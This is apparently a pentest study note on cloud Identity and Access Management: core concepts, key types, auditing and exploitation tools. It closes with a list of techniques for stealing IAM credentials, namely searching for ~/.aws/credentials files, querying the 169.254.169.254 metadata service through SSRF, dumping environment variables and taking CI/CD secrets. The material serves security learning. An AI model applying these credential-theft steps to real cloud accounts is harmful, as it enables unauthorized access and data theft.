Quartz 4

IAM (Identity and Access Management)

3 min read

IAM (Identity and Access Management) credentials are used to control and manage access to cloud services and resources. When a penetration tester obtains IAM credentials, especially those with administrative privileges, they can perform high-level operations such as provisioning services, modifying configurations, or accessing sensitive data across the cloud environment.

📝 Overview

What it is: A security framework that manages digital identities and regulates how they access resources. It is the “gatekeeper” of modern enterprise and cloud environments. Phase: passive (Recon) / attack / postexploitation Target: Active Directory, AWS, Azure, Google Cloud

⚙️ Core Concepts

  • Principle of Least Privilege (PoLP): Giving users only the minimum access they need to do their jobs.
  • RBAC vs. ABAC: * Role-Based: Access based on your job title (e.g., “Manager”).
    • Attribute-Based: Access based on context (e.g., “Only if on the office Wi-Fi during business hours”).
  • SSO (Single Sign-On): One set of credentials for multiple systems.

💻 Essential CLItool options

ToolPurpose
aws-cliThe native tool for interacting with AWS IAM.
PacuThe “Metasploit of AWS”—specifically for IAM exploitation.
ProwlerAn auditing tool that finds IAM misconfigurations.
PMapperVisualizes IAM permissions to find hidden PrivEsc paths.

🏷️ Tags

IAM CloudSecurity AccessControl PrivEsc attack postexploitation CLItool PenTestPlus

IAM Credentials

📝 Overview

What it is: The programmatic “keys” used by users and services to authenticate with cloud providers or identity systems. Target Phase: attack postexploitation Operating System: Cross-platform (Cloud-native)

⚙️ Key Types

  • Long-term Keys: Permanent access keys (e.g., AWS Access Key ID). Dangerous if leaked.
  • Temporary Credentials: Short-lived tokens granted to roles (usually valid for 1-12 hours).
  • Service Accounts: Credentials specifically for non-human users (bots, apps, scripts).

⚠️ Notes for the Vault

  • Hardcoded Secrets: This is the #1 finding in cloud audits. Always search codebases for strings like SECRET_KEY or ACCESS_KEY.
  • Privilege Escalation: A stolen “Support” key might have iam:PassRole permissions, allowing you to attach an “Admin” role to a new VM you create.

🏷️ Tags

IAM CloudSecurity Credentials postexploitation attack CLItool PenTestPlus

How Pentesters Steal IAM Credentials

Since you are mapping out attack paths, here are the primary ways these are harvested:

  1. Local Configuration Files: Pentesters use linux commands like grep or Windows findstr to hunt for hidden credential files (e.g., ~/.aws/credentials or ~/.azure/config).

  2. Metadata Services (SSRF): If you compromise a web server, you can query the internal metadata service (like 169.254.169.254) to pull the IAM role credentials assigned to that server.

  3. Environment Variables: Developers often store keys in environment variables (env) for easy access, which can be dumped once you have a shell.

  4. CI/CD Pipelines: Tools like Jenkins or GitHub Actions store “Secrets.” If you gain access to the build server, you can often exfiltrate these keys.

Graph View